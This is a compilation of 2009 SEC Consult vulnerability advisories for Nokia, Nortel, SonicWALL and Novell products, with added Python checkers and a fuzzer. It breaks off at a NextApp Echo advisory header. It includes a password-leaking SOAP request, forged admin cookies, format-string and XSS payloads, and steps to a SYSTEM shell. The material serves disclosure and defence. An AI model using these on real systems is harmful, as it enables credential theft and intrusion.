[Full-disclosure] SEC Consult SA-20090707-0 :: Symbian S60 / Nokia firmware media codecs multiple memory corruption vulnerabilities
SEC Consult Security Advisory 20090707-0
=======================================================================
title: Symbian S60 / Nokia firmware media codecs multiple memory corruption vulnerabilities
vulnerable version: All Nokia smartphones with multimedia capabilities are likely vulnerable (tested on E61, E71, N96)
impact: Critical
homepage: http://www.nokia.com/
found: May 2009
by: Bernhard Mueller / SEC Consult Vulnerability Lab
=======================================================================

Vulnerability overview:
-----------------------
Multiple memory corruption vulnerabilities have been identified in the multimedia codecs used by RealPlayer and the MMS viewer on Nokia's Symbian/S60 based smartphones. An attacker could leverage these bugs to gain control of the program counter register and execute arbitrary code on a target smartphone. The bugs can be triggered directly inside the MMS viewer of the target by sending an MMS with an embedded video file.

Vulnerability description:
--------------------------
This advisory describes multiple bugs found within several libraries:

* rarender.dll
* STH264HWDecHwDevice.dll
* clntcore.dll
* HxMmfCtrl.dll
* mdfh264payloadformat.dll
* MMFDevSound.dll
* ArmRV89Codec.dll

The effects that can be triggered with manipulated video files range from user panic exceptions to exploitable data abort conditions that can be used to indirectly influence function pointers and gain control of the exploited process.

A more detailed analysis, as well as the testing approach used to identify the vulnerabilities, can be found in the whitepaper "From 0 to 0day in Symbian", available at:
https://www.sec-consult.com/files/Pwning_Nokia_V1.03_PUB.pdf

Proof of concept:
-----------------
SEC Consult will not release a full proof of concept exploit to the public.

Vulnerable versions:
--------------------
All Nokia / Symbian S60 smartphones with RealPlayer are likely vulnerable. The test and debugging subject was a Nokia N96 smartphone with firmware version 11.018. The resulting files were also sent to a Nokia E61i and a Nokia E71 and crashed either the MMS application or the operating system.

Vendor contact timeline:
------------------------
2009-06-13: Full fuzzing results sent to Nokia
2009-06-30: Whitepaper sent to Nokia
2009-07-06: Limited public release

Patch:
------
No patch is available at the time of this writing.

Workaround:
-----------
From an end user perspective, security best practices should be applied that are similar to those required on desktop PCs. The following list contains some of the most important guidelines:

* Perform regular software updates
* Do not install unnecessary applications and services
* Use Anti Virus software
* Take care when browsing the web
* Do not open SMS, MMS or emails from unknown sources

--
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF Bernhard Mueller / @2009

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Pwning Nokia phones (and other Symbian based smartphones)
Hello,

I'll just leave this here ;)

https://www.sec-consult.com/files/SEC_Consult_Vulnerability_Lab_Pwning_Symbian_V1.03_PUBLIC.pdf

Abstract:

1. Perform static analysis of XIP ROM images (dumping, restoring import and export tables, searching for unsafe function calls)
2. Enable run mode debugging of system binaries running from ROM, by cracking the AppTRK debug agent
3. (Ab-)use the AppTRK debug agent as a foundation for dynamic vulnerability analysis
4. Build an exemplary file fuzzer for the video- and audio codecs shipped with current Nokia smartphones
5. List and briefly analyze the identified bugs
6. Discuss further ideas and concepts, such as jailbreak shellcode, and an IRC bot trojan for Symbian

We aim to show that it is possible to find and exploit bugs on Symbian smartphones, even in preinstalled system applications, without having access to special development hardware, and that exploits and worms similar to those found on desktop systems may be possible on Symbian. The bugs listed in this paper have been sent to Nokia and are currently under review.

Mobile phone manufacturers should be aware that remote vulnerabilities of the kind discussed in this paper could be used in targeted attacks to remotely compromise a smartphone (track GPS, turn on mic, etc.), or as a means of propagation for mobile network worms.

--
Bernhard Mueller
Security Consultant

SEC Consult Unternehmensberatung GmbH
www.sec-consult.com
A-1190 Vienna, Mooslackengasse 17
phone +43 1 8903043 34
fax +43 1 8903043 15
mobile +43 676 840301 718
email b.muel...@sec-consult.com

Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223
Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt

Advisor for your information security.
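The advisory above reports codec crashes caused by manipulated video files, and the whitepaper abstract lists a file fuzzer for the video and audio codecs as one of its steps. The following is an added example of the simplest useful form of such a fuzzer, written for this page and not taken from the whitepaper or SEC Consult's tooling: it parses the top-level box structure of an ISO base media file (the container used by the 3GP/MP4 clips an MMS carries), then produces one mutant per box and boundary size value. The seed clip is a constructed two-box file, and the box-size boundary values are the editor's choice; the parse_boxes function also shows the bounds checks a codec should apply instead of trusting the size field.

```python
import struct
from pathlib import Path

# Constructed seed: a minimal ISO base media file made of an 'ftyp' box and an
# 'mdat' box. Every box starts with a 4-byte big-endian size (header included)
# and a 4-byte type; size 0 means "to end of file", size 1 means that a 64-bit
# "largesize" follows the type field.
SAMPLE_CLIP = (
    struct.pack(">I", 20) + b"ftyp" + b"3gp4" + struct.pack(">I", 0) + b"3gp4"
    + struct.pack(">I", 16) + b"mdat" + b"\x00" * 8
)

# Boundary values that exercise a parser's size arithmetic: zero, the largesize
# marker without a largesize, a size smaller than the header, and sign-bit and
# wrap-around values. 'file length + 1' is added per file in mutate_box_sizes.
BOUNDARY_SIZES = (0, 1, 7, 0x80000000, 0xFFFFFFFF)


def parse_boxes(data: bytes):
    """Return [(offset, size, type)] for the top-level boxes or raise ValueError.

    Every malformed size is rejected before it can be used as an index or a
    copy length; this is the check the crashing codecs lacked."""
    boxes, off, end = [], 0, len(data)
    while off < end:
        if end - off < 8:
            raise ValueError(f"truncated box header at offset {off}")
        size, kind = struct.unpack_from(">I4s", data, off)
        header = 8
        if size == 0:
            size = end - off
        elif size == 1:
            if end - off < 16:
                raise ValueError(f"truncated largesize at offset {off}")
            size = struct.unpack_from(">Q", data, off + 8)[0]
            header = 16
        if size < header or size > end - off:
            raise ValueError(f"box {kind!r} at offset {off} has bad size {size}")
        boxes.append((off, size, kind))
        off += size
    return boxes


def mutate_box_sizes(data: bytes):
    """Return (label, mutant) pairs: each top-level box size replaced in turn by
    every boundary value plus 'file length + 1'. Mutants keep the seed's length,
    so only the size field differs from the original clip."""
    mutants = []
    for off, _size, kind in parse_boxes(data):
        for value in BOUNDARY_SIZES + (len(data) + 1,):
            mutant = data[:off] + struct.pack(">I", value) + data[off + 4:]
            mutants.append((f"{kind.decode()}_{off}_size_{value:#x}", mutant))
    return mutants


def count_parseable(mutants):
    """How many mutants the strict parser still accepts (the rest are the
    inputs that a lenient codec would mis-handle)."""
    accepted = 0
    for _label, mutant in mutants:
        try:
            parse_boxes(mutant)
            accepted += 1
        except ValueError:
            pass
    return accepted


def write_corpus(out_dir: str, seed: bytes = SAMPLE_CLIP):
    """Write every mutant to out_dir as a .3gp file and return the paths; these
    are the files to open in the target player or attach to a test MMS."""
    out = Path(out_dir)
    out.mkdir(parents=True, exist_ok=True)
    paths = []
    for i, (label, mutant) in enumerate(mutate_box_sizes(seed)):
        path = out / f"mut{i:03d}_{label}.3gp"
        path.write_bytes(mutant)
        paths.append(path)
    return paths


if __name__ == "__main__":
    for p in write_corpus("mutants"):
        print(p)
```

In practice the seed would be a real clip recorded on the handset, the mutation would be applied to every nested box (not only the top level), and each mutant would be played on the device under the debug agent described in the whitepaper so that a panic or data abort can be tied back to the mutant that caused it.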
[Full-disclosure] SEC Consult SA-20090525-1 :: Nortel Contact Center Manager Server Password Disclosure Vulnerability
SEC Consult Security Advisory 20090525-1
=======================================================================
title: Nortel Contact Center Manager Server Password Disclosure
program: Nortel Contact Center Manager Server
vulnerable version: 6.0
homepage: http://www.nortel.com/ccms
found: 2008-11-14
by: David Matscheko / SEC Consult Vulnerability Lab
permanent link: https://www.sec-consult.com/advisories_e.html#a57
=======================================================================

Vendor description:
-------------------
Contact Center Manager Server (CCMS) offers a scalable solution for dynamic contact center environments requiring sophistication and differentiation in the care offered to their customers. CCMS provides skill-based routing; call treatment flexibility, real time displays, multimedia routing, and comprehensive management and reporting functionality - empowering contact center managers with the tools and agility to deliver unique and unprecedented care to their customers. The rich scripting language supports multifaceted call routing and treatment decisions based on combinations of real time conditions.
[source: http://www.nortel.com/ccms]

Vulnerability overview:
-----------------------
The Nortel Contact Center Manager Server web application provides a SOAP interface. This interface does not require authorisation and responds to certain requests with sensitive information.

Vulnerability description:
--------------------------
The following SOAP request queries the user data for the user sysadmin:

---
POST /Common/WebServices/SOAPWrapperCommon/SOAPWrapperCommonWS.asmx HTTP/1.1
Host: 10.1.2.3
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://SoapWrapperCommon.CCMA.Applications.Nortel.com/SOAPWrapperCommon_UsersWS_GetServers_Wrapper"
Content-Length: 661

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SOAPWrapperCommon_UsersWS_GetServers_Wrapper xmlns="http://SoapWrapperCommon.CCMA.Applications.Nortel.com">
      <ccmaUserName>string</ccmaUserName>
      <clientIP>string</clientIP>
      <componentID>string</componentID>
      <sessionID>string</sessionID>
      <strUserID>string</strUserID>
      <strPassword>string</strPassword>
    </SOAPWrapperCommon_UsersWS_GetServers_Wrapper>
  </soap:Body>
</soap:Envelope>
---

The following is an excerpt of the response to the previous query. It contains the user sysadmin with the corresponding password (password, server IP address and server name have been changed):

---
&lt;rs:data&gt;
  &lt;z:row ID='0' ServerName='abcd01' ServerIP='10.1.2.3' ServerDescription='abcd01' ServerUserID='sysadmin' ServerPassword='pwd4hugo' ServerType='1' SystemVersion='6.0' OpenQueue='0' HeteroNetworking='0' Network='0' ServerSWBuild='4.4F' ServerSULevel='CCMS_6.0_SU_05' ServerDPLevel='CCMS_6.0_SUS_0503' BasicIVR='1' GracePeriodState='3' RefreshIntervalsElapsed='0'/&gt;
&lt;/rs:data&gt;
---

Proof of concept:
-----------------
This vulnerability can be exploited with a web browser and plugins / web proxy.

Vulnerable versions:
--------------------
The version tested was 06.00.004.03 with the following updates applied:
CCMA_6.0_SU_05
CCMA_6.0_SUS_0501
CCMA_6.0_SUS_0502
Prior versions are most likely also vulnerable.

Vendor contact timeline:
------------------------
January 2009: Vendor informed about vulnerability
2009-05-14: Patch available
2009-05-25: Public Release

Patch:
------
The vendor has released a vulnerability fix which addresses the issue. In addition, the vendor has released a public security advisory containing update instructions.
URL: http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=905808

EOF David Matscheko / @2009
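The request and response above are all a tester needs, but it is worth having a repeatable check rather than pasting XML into a proxy. The following is an added example written for this page (it is not SEC Consult's or Nortel's code): build_request reproduces the advisory's unauthenticated SOAP call byte for byte, and extract_server_rows pulls every z:row out of a response and reports any row that carries a ServerPassword, which is the condition that marks a host as vulnerable. The sample response is constructed from the advisory's excerpt; the names of the SOAP response and result elements are assumed to follow the usual .asmx convention and are not given in the advisory. Nothing here talks to the network; the request bytes are returned for the caller to send over a socket or with curl.

```python
import html
import re
import xml.etree.ElementTree as ET

CCMA_NS = "http://SoapWrapperCommon.CCMA.Applications.Nortel.com"
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
METHOD = "SOAPWrapperCommon_UsersWS_GetServers_Wrapper"
ENDPOINT = "/Common/WebServices/SOAPWrapperCommon/SOAPWrapperCommonWS.asmx"
PARAMS = ("ccmaUserName", "clientIP", "componentID", "sessionID", "strUserID", "strPassword")


def build_request(host: str) -> bytes:
    """The raw HTTP request from the advisory, with placeholder parameter values."""
    body = (
        '<?xml version="1.0" encoding="utf-8"?>'
        f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body>'
        f'<{METHOD} xmlns="{CCMA_NS}">'
        + "".join(f"<{p}>string</{p}>" for p in PARAMS)
        + f"</{METHOD}></soap:Body></soap:Envelope>"
    ).encode()
    head = (
        f"POST {ENDPOINT} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: text/xml; charset=utf-8\r\n"
        f'SOAPAction: "{CCMA_NS}/{METHOD}"\r\n'
        f"Content-Length: {len(body)}\r\n\r\n"
    ).encode()
    return head + body


ROW_RE = re.compile(r"<z:row\b([^>]*)>")
ATTR_RE = re.compile(r"(\w+)='([^']*)'")


def extract_server_rows(soap_response: str):
    """Return one dict of attributes per <z:row> in the response.

    The recordset comes back XML-escaped inside the SOAP result element, so the
    envelope is parsed first and the unescaped text nodes are scanned."""
    envelope = ET.fromstring(soap_response)
    rows = []
    for text in envelope.itertext():
        for tag in ROW_RE.finditer(text):
            rows.append(dict(ATTR_RE.findall(tag.group(1))))
    return rows


def leaked_credentials(rows):
    """(server IP, user, password) for every row that discloses a password."""
    return [(r.get("ServerIP"), r.get("ServerUserID"), r["ServerPassword"])
            for r in rows if r.get("ServerPassword")]


# Constructed response modelled on the advisory's excerpt; the *Response and
# *Result element names are assumed (.asmx convention), not taken from the page.
SAMPLE_RESPONSE = (
    f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body>'
    f'<{METHOD}Response xmlns="{CCMA_NS}"><{METHOD}Result>'
    + html.escape(
        "<rs:data><z:row ID='0' ServerName='abcd01' ServerIP='10.1.2.3' "
        "ServerDescription='abcd01' ServerUserID='sysadmin' ServerPassword='pwd4hugo' "
        "ServerType='1' SystemVersion='6.0' ServerSWBuild='4.4F'/></rs:data>",
        quote=False)
    + f"</{METHOD}Result></{METHOD}Response></soap:Body></soap:Envelope>"
)

if __name__ == "__main__":
    print(build_request("10.1.2.3").decode())
    print(leaked_credentials(extract_server_rows(SAMPLE_RESPONSE)))
```

Run the check from a host that has no CCMA session at all: a non-empty result from leaked_credentials for an unauthenticated request is the finding, and after the vendor fix the same request should be refused or return no ServerPassword values.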
[Full-disclosure] SEC Consult SA-20090525-4 :: SonicOS Format String Vulnerability
SEC Consult Security Advisory 20090525-4
=======================================================================
title: SonicOS Format String Vulnerability
program: SonicOS
vulnerable version: PRO 4100 SonicOS 4.0.0.2-51e Standard and Enhanced, possibly other versions
homepage: http://www.sonicwall.com
found: October 2006
by: lofi42
permanent link: https://www.sec-consult.com/advisories_e.html#a54
=======================================================================

Product description:
--------------------
SonicOS Enhanced (SonicOSe) is the latest version of SonicWALL's powerful SonicOS operating system, designed for the next generation of SonicWALL firewall/VPN appliances.

Vulnerability overview:
-----------------------
A format string vulnerability exists in the logfile parsing function of SonicOS. An attacker could crash the system or execute arbitrary code by injecting format string metacharacters into the logfile, if an administrator subsequently uses the SonicOS GUI to view the log.

Proof of concept:
-----------------
There are multiple ways to inject format string characters into the logs. The following methods can be used to test for the vulnerability:

1. CFS: Add ebay.com to your Forbidden Domains and access http://www.ebay.com/%s%s%s%s%s%s/.
2. GroupVPN: Establish a GroupVPN tunnel and enter %s%s%s%s%s as the XAUTH username.
3. Web frontend: Enter %s %s%s%s%s as the username at the login page of your SonicWALL.

SEC Consult will not release code execution exploits for this vulnerability to the public.

Vendor contact timeline:
------------------------
2006: Vulnerability found
2006.10.25: Vulnerability first reported to vendor
2009.02.17: Vulnerability reported to vendor again
2009.03.16: Request for status update
2009.04.21: Request for status update
2009.05.25: Public Release

Patch:
------
SEC Consult was not able to get any vendor feedback on this issue. We are currently not aware of a patch or workaround.

EOF SEC Consult Vulnerability Lab / @2009
[Full-disclosure] SEC Consult SA-20090525-3 :: SonicWALL Global VPN Client Local Privilege Escalation Vulnerability
SEC Consult Security Advisory 20090525-3
=======================================================================
title: SonicWALL Global VPN Client Local Privilege Escalation Vulnerability
program: SonicWALL Global VPN Client
vulnerable version: Global VPN Client <= 4.0.0.835, possibly other versions
homepage: http://www.sonicwall.com
found: October 2006
by: lofi42
permanent link: https://www.sec-consult.com/advisories_e.html#a55
=======================================================================

Vendor description:
-------------------
The SonicWALL Global VPN Client offers an easy-to-use, easy-to-manage Virtual Private Network (VPN) solution that provides users at distributed locations with secure, reliable remote access via broadband, wireless and dial-up connections.
[source: http://www.sonicwall.com/downloads/Global_VPN_DS_US.pdf]

Vulnerability overview:
-----------------------
A local privilege escalation vulnerability exists in the SonicWALL Global VPN Client. By exploiting this vulnerability, a local attacker could execute code with LocalSystem privileges.

Vulnerability description:
--------------------------
During installation of the SonicWALL Global VPN Client, the permissions for the installation folder %ProgramFiles%\SonicWALL\SonicWALL Global VPN Client are by default set to Everyone:Full Control without any warning. The service RampartSvc is started from this folder. Services are started under the LocalSystem account. There is no protection of the service files. It is possible for an unprivileged user to replace the service executable with a file of his choice to get full access with LocalSystem privileges.

Proof of concept:
-----------------
This vulnerability can be exploited without any special exploit code.

Vendor contact timeline:
------------------------
2006: Vulnerability found
2006.10.25: Vulnerability first reported to vendor
2009.02.17: Vulnerability reported to vendor again
2009.03.16: Request for status update
2009.04.21: Request for status update
2009.05.25: Public Release

Patch:
------
SEC Consult was not able to get any vendor feedback on this issue. We are currently not aware of a patch or workaround.

EOF SEC Consult Vulnerability Lab / @2009
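A weak DACL on a service's directory, as described above, is easy to check for once you know where the service binary lives (sc qc RampartSvc shows the path). The following is an added example for this page, not SEC Consult's or SonicWALL's code: it parses the output of icacls for a directory and flags every ACE that grants a low-privilege principal a right sufficient to replace or modify what LocalSystem will execute. The two icacls outputs are constructed (the first reproduces the Everyone:Full Control DACL the advisory describes, the second a repaired DACL); the sets of low-privilege principals and write rights are the editor's, and check_directory runs icacls only when executed on a Windows host.

```python
import re
import subprocess
import sys

# Principals every interactive local user belongs to; write access for any of
# them on a service binary or its directory lets that user replace what the
# service runs as LocalSystem.
LOW_PRIV_PRINCIPALS = {
    "Everyone",
    "BUILTIN\\Users",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
}
# icacls right codes that allow replacing or modifying the object: full control,
# modify, write, write data, append data, delete child, delete.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC", "D"}

ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<rights>(?:\([A-Za-z,]+\))+)$")


def parse_icacls(output: str, path: str):
    """Parse `icacls <path>` output into [(principal, set_of_right_codes)].

    icacls prints the path followed by the first ACE on one line, the remaining
    ACEs on indented continuation lines, and a 'Successfully processed' summary."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised icacls line: {line!r}")
        rights = set()
        for group in re.findall(r"\(([A-Za-z,]+)\)", m.group("rights")):
            rights.update(group.split(","))
        aces.append((m.group("principal"), rights))
    return aces


def writable_by_low_priv(aces):
    """The ACEs that let an ordinary user modify the object, with the offending rights."""
    return [(principal, sorted(rights & WRITE_RIGHTS))
            for principal, rights in aces
            if principal in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS]


SERVICE_DIR = r"C:\Program Files\SonicWALL\SonicWALL Global VPN Client"
PAD = " " * (len(SERVICE_DIR) + 1)

# Constructed icacls output reproducing the DACL the advisory describes.
WEAK_ACL = (
    SERVICE_DIR + " Everyone:(OI)(CI)(F)\n"
    + PAD + "NT AUTHORITY\\SYSTEM:(OI)(CI)(F)\n"
    + PAD + "BUILTIN\\Administrators:(OI)(CI)(F)\n"
    + "\nSuccessfully processed 1 files; Failed processing 0 files\n"
)
# Constructed icacls output for the same directory with a sane DACL.
FIXED_ACL = (
    SERVICE_DIR + " NT AUTHORITY\\SYSTEM:(OI)(CI)(F)\n"
    + PAD + "BUILTIN\\Administrators:(OI)(CI)(F)\n"
    + PAD + "BUILTIN\\Users:(OI)(CI)(RX)\n"
    + "\nSuccessfully processed 1 files; Failed processing 0 files\n"
)


def check_directory(path: str):
    """Run icacls on the live host and return the weak ACEs (Windows only)."""
    out = subprocess.run(["icacls", path], capture_output=True, text=True, check=True).stdout
    return writable_by_low_priv(parse_icacls(out, path))


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else SERVICE_DIR
    if sys.platform == "win32":
        print(check_directory(target))
    else:
        print(writable_by_low_priv(parse_icacls(WEAK_ACL, SERVICE_DIR)))
```

Run it against the directory of every service binary that executes as LocalSystem, not only this one; the same check applies to the binary itself and to any DLL it loads from that directory. An empty result from writable_by_low_priv is what a correctly installed service should produce.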
[Full-disclosure] SEC Consult SA-20090525-2 :: SonicWALL Global Security Client Local Privilege Escalation Vulnerability
SEC Consult Security Advisory 20090525-2
=======================================================================
title: SonicWALL Global Security Client Local Privilege Escalation Vulnerability
program: SonicWALL Global Security Client
vulnerable version: 1.0.0.15 and possibly other versions
homepage: http://www.sonicwall.com
found: October 2006
by: lofi42
permanent link: https://www.sec-consult.com/advisories_e.html#a56
=======================================================================

Vendor description:
-------------------
The SonicWALL Global Security Client offers IT professionals the capability to manage a mobile user's online access, based upon corporate policies, in order to ensure optimal security of the network and maximize network resources. Instant messaging, high-risk Web sites and network file access can all be allowed or disallowed as security and productivity concerns dictate.
[source: http://www.sonicwall.com/downloads/DS_GlobalSecurityClient_A4.pdf]

Vulnerability overview:
-----------------------
Local exploitation of a design error in SonicWALL's Global Security Client could allow attackers to obtain increased privileges.

Vulnerability description:
--------------------------
The problem specifically exists because SYSTEM privileges are not dropped when accessing the GSC properties from the System Tray applet. The vulnerability can be exploited by right-clicking the System Tray icon, choosing "Log", then right-clicking in the Event Viewer and choosing "Open Log File". The file-open dialog that appears runs with SYSTEM privileges and can be abused by navigating to C:\WINDOWS\SYSTEM32\, right-clicking cmd.exe and selecting "Open"; doing so spawns a command shell with SYSTEM privileges.

Proof of concept:
-----------------
This vulnerability can be exploited without any special exploit code.

Vendor contact timeline:
------------------------
2006: Vulnerability found
2006.10.25: Vulnerability first reported to vendor
2009.02.17: Vulnerability reported to vendor again
2009.03.16: Request for status update
2009.04.21: Request for status update
2009.05.25: Public Release

Patch:
------
SEC Consult was not able to get any vendor feedback on this issue. We are currently not aware of a patch or workaround.

EOF SEC Consult Vulnerability Lab / @2009
[Full-disclosure] SEC Consult SA-20090525-0 :: Nortel Contact Center Manager Server Authentication Bypass Vulnerability
SEC Consult Security Advisory 20090525-0
=======================================================================
title: Nortel Contact Center Manager Server Authentication Bypass
program: Nortel Contact Center Manager Server
vulnerable version: 6.0
homepage: http://www.nortel.com/ccms
found: 2008-11-14
by: Bernhard Mueller / SEC Consult Vulnerability Lab
permanent link: https://www.sec-consult.com/advisories_e.html#a58
=======================================================================

Vendor description:
-------------------
Contact Center Manager Server (CCMS) offers a scalable solution for dynamic contact center environments requiring sophistication and differentiation in the care offered to their customers. CCMS provides skill-based routing; call treatment flexibility, real time displays, multimedia routing, and comprehensive management and reporting functionality - empowering contact center managers with the tools and agility to deliver unique and unprecedented care to their customers. The rich scripting language supports multifaceted call routing and treatment decisions based on combinations of real time conditions.
[source: http://www.nortel.com/ccms]

Vulnerability overview:
-----------------------
The Nortel Contact Center Manager Server web application relies on client side cookies to check the roles of authenticated users. Authentication can be bypassed by manually setting the required cookies. By exploiting this vulnerability, an attacker can bypass authentication and access the Nortel Contact Center Manager Server.

Vulnerability description:
--------------------------
The following cookies have to be set to access all menu items:

LoginMsgSwitch=True
LoginMsgAccepted=True
Logged=True
isAdmin=True
LoginMsgSwitch=True
LoginMsgAccepted=True
IsConfig=1
IsUser=1
IsRTD=1
IsReport=1
IsScript=1
IsAudit=1
IsEmHelp=1
isOutbound=1
UserID=x
AuditSwitch=on
LoginMsgAccepted=True

Proof of concept:
-----------------
This vulnerability can be exploited with a web browser and plugins / web proxy.

Vulnerable versions:
--------------------
The version tested was 06.00.004.03 with the following updates applied:
CCMA_6.0_SU_05
CCMA_6.0_SUS_0501
CCMA_6.0_SUS_0502
Prior versions are most likely also vulnerable.

Vendor contact timeline:
------------------------
January 2009: Vendor informed about vulnerability
2009-05-14: Patch available
2009-05-25: Public Release

Patch:
------
The vendor has released a vulnerability fix which addresses the issue. In addition, the vendor has released a public security advisory containing update instructions.
URL: http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=905698

EOF Bernhard Mueller / @2008
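The root cause above is that role flags such as isAdmin=True are read from the client's cookies, so any client can grant itself the role. The following is an added example for this page, not code from the advisory or from Nortel: vulnerable_is_admin reproduces that pattern and accepts the forged cookie set from the advisory, while SessionStore and hardened_is_admin show the usual fix, where the only thing the cookie carries is a random session id bound to an HMAC and the roles live server-side. The cookie name CCMASESSION, the role name "admin" and the HMAC construction are the editor's choices, not Nortel's.

```python
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie

# The cookies the advisory lists; a client can set them without ever logging in.
FORGED_COOKIES = {
    "LoginMsgSwitch": "True", "LoginMsgAccepted": "True", "Logged": "True",
    "isAdmin": "True", "IsConfig": "1", "IsUser": "1", "IsRTD": "1",
    "IsReport": "1", "IsScript": "1", "IsAudit": "1", "IsEmHelp": "1",
    "isOutbound": "1", "UserID": "x", "AuditSwitch": "on",
}


def cookie_header(cookies):
    """Serialise a cookie dict the way a browser or proxy sends it."""
    return "; ".join(f"{k}={v}" for k, v in cookies.items())


def parse_cookies(header):
    jar = SimpleCookie()
    jar.load(header)
    return {name: morsel.value for name, morsel in jar.items()}


def vulnerable_is_admin(header):
    """The pattern the advisory describes: authorisation decided from flags the
    client supplies, so whoever sets isAdmin=True is an administrator."""
    c = parse_cookies(header)
    return c.get("Logged") == "True" and c.get("isAdmin") == "True"


class SessionStore:
    """Hardened version: roles are stored server-side under a random session id,
    and the cookie value is id.hmac(id) so a guessed or edited id never resolves."""

    def __init__(self, key=None):
        self._key = key or secrets.token_bytes(32)   # server secret, never sent
        self._sessions = {}

    def _sign(self, sid):
        return hmac.new(self._key, sid.encode(), hashlib.sha256).hexdigest()

    def login(self, user, roles):
        """Called only after the password check succeeded; returns the cookie value."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "roles": frozenset(roles)}
        return f"{sid}.{self._sign(sid)}"

    def resolve(self, token):
        if not token or "." not in token:
            return None
        sid, sig = token.rsplit(".", 1)
        if not hmac.compare_digest(sig, self._sign(sid)):
            return None
        return self._sessions.get(sid)


def hardened_is_admin(store, header):
    """Authorisation from the server-side session only; every other cookie is ignored."""
    session = store.resolve(parse_cookies(header).get("CCMASESSION"))
    return session is not None and "admin" in session["roles"]


if __name__ == "__main__":
    forged = cookie_header(FORGED_COOKIES)
    store = SessionStore()
    print("vulnerable check with forged cookies:", vulnerable_is_admin(forged))
    print("hardened check with forged cookies:  ", hardened_is_admin(store, forged))
    print("hardened check after real login:     ",
          hardened_is_admin(store, f"CCMASESSION={store.login('sysadmin', {'admin'})}"))
```

The HMAC is not what makes this safe on its own; the point is that the cookie names nothing a client could usefully change, and the lookup happens in state the client cannot write to. Any flag like isAdmin that the browser can set is an attacker-controlled input and has to be treated as one.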
[Full-disclosure] SEC Consult SA-20090415-0 :: Multiple Vulnerabilities in Novell Teaming
SEC Consult Security Advisory 20090415-0
=======================================================================
title: Novell Teaming Multiple Vulnerabilities
       * Username Enumeration
       * Multiple Cross Site Scripting
       * Includes vulnerable Liferay portal
program: Novell Teaming
vulnerable version: 1.0.3
homepage: http://www.novell.com/products/teaming/
found: February 2009
by: Michael Kirchner, SEC Consult Vulnerability Lab
link: https://www.sec-consult.com/files/20090415-0-novell-teaming.txt
=======================================================================

Vendor description:
-------------------
Web conferencing software from Novell. Teaming and conferencing offers a number of solutions to improve productivity for enterprises, with web conferencing just one of those solutions.
[source: http://www.novell.com/products/teaming/]

Vulnerability overview:
-----------------------
Multiple vulnerabilities have been identified in Novell Teaming. These include enumeration of usernames, information disclosure, and cross site scripting flaws. An attacker could leverage these vulnerabilities to collect information about the system and its users and conduct effective (XSS supported) hybrid phishing attacks.

Vulnerability description:
--------------------------
1. Username enumeration:

User authentication takes place via a login form at:
https://teaming.example.com/c/portal/login

The web application reacts differently for valid and invalid usernames ("Please enter a valid login" / "Auhtentication failed"). This allows an attacker to deduce whether a specific username exists. The attacker could use this flaw to generate a list of usernames for dictionary or brute-force attacks.

2. Cross site scripting:

The parameters p_p_state and p_p_mode are not validated or escaped by the web application. Script code can be injected into these parameters, allowing for cross site scripting attacks.

Example:
https://teaming.example.com/web/guest/home?p_p_id=82&p_p_action=1&p_p_state=%3Cscript%3Ealert('xss+vulnerability')%3C/script%3E&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=1&p_p_col_count=2&_82_struts_action=%2Flanguage%2Fview&_82_languageId=de_DE

3. Vulnerable Liferay portal:

Novell Teaming includes a version of Liferay portal with known vulnerabilities (two cross site scripting flaws):

* Liferay Portal login Cross-Site Scripting Vulnerability
  http://secunia.com/advisories/27537/
* Liferay Portal emailAddress Cross-Site Scripting
  http://secunia.com/advisories/27821/

Proof of concept:
-----------------
No special exploit code is required to exploit these vulnerabilities.

Vulnerable versions:
--------------------
Version 1.0.3 of Novell Teaming is vulnerable to the issues described. Prior versions are most likely also vulnerable.

Vendor contact timeline:
------------------------
2009-02-19: Vendor informed about vulnerabilities
2009-04-14: Patches available

Patch:
------
The vendor has provided fixes for the issues described. In addition, two Technical Information Documents containing update instructions have been released. These can be found at the following URLs:

* TID 7002997
  http://www.novell.com/support/php/search.do?cmd=displayKC&docType=kc&externalId=7002997&sliceId=1&docTypeID=DT_TID_1_1&dialogID=33090060&stateId=1%200%2033084737
* TID 7002999
  http://www.novell.com/support/php/search.do?cmd=displayKC&docType=kc&externalId=7002999&sliceId=1&docTypeID=DT_TID_1_1&dialogID=33090060&stateId=1%200%2033084737

EOF SEC Consult Vulnerability Lab / @2009
[Full-disclosure] SEC Consult SA-20090305-0 :: NextApp Echo XML Injection Vulnerability
SEC Consult Security Advisory 20090305-0
=======================================================================
title: NextApp Echo XML Injection Vulnerability
program: NextApp Echo
vulnerable version: Echo2 2.1.1
homepage: http://echo.nextapp.com/site/echo2
found: Feb. 2008
by: Anonymous / SEC Consult Vulnerability Lab
